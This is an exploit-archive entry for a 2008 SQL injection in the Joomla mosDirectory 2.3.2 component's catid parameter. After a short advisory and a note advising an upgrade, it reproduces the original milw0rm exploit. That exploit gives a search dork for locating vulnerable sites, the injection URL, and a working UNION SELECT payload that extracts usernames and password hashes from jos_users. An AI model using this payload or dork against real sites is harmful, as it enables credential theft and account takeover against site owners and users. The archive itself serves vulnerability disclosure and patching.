Joomla Component mosDirectory 2.3.2 (catid) Remote SQL Injection Vulnerability

vendor:

mosDirectory

by:

aNa TrYaGi

CVSS

HIGH

SQL Injection

CWE

Product Name: mosDirectory

Affected Version From: 2.3.2002

Affected Version To: 2.3.2002

Patch Exists: YES

Related CWE: N/A

CPE: a:joomla:mosdirectory:2.3.2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Joomla Component mosDirectory 2.3.2 (catid) Remote SQL Injection Vulnerability

Joomla Component mosDirectory 2.3.2 is vulnerable to a remote SQL injection vulnerability. An attacker can exploit this vulnerability by sending a specially crafted SQL query to the vulnerable parameter 'catid' in the 'index.php' page. This can allow the attacker to gain access to the database and execute arbitrary SQL commands.

Mitigation:

The vendor has released an update to address this vulnerability. Users should upgrade to the latest version of the software.

Source

Exploit-DB raw data:

###########################################################################################
### Joomla Component mosDirectory 2.3.2 (catid) Remote SQL Injection Vulnerability      ###
### Script :  :(                                                                          ###
### Dork : inurl:index.php?option=com_directory                                         ###
### Injection Adress : /index.php?option=com_directory&page=viewcat&catid=[SQL Code]    ###
### SQL Code :                                                                          ###
###   -1/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/jos_users/*  ###
###                                     aNa TrYaGi                                      ###
###########################################################################################

# milw0rm.com [2008-02-03]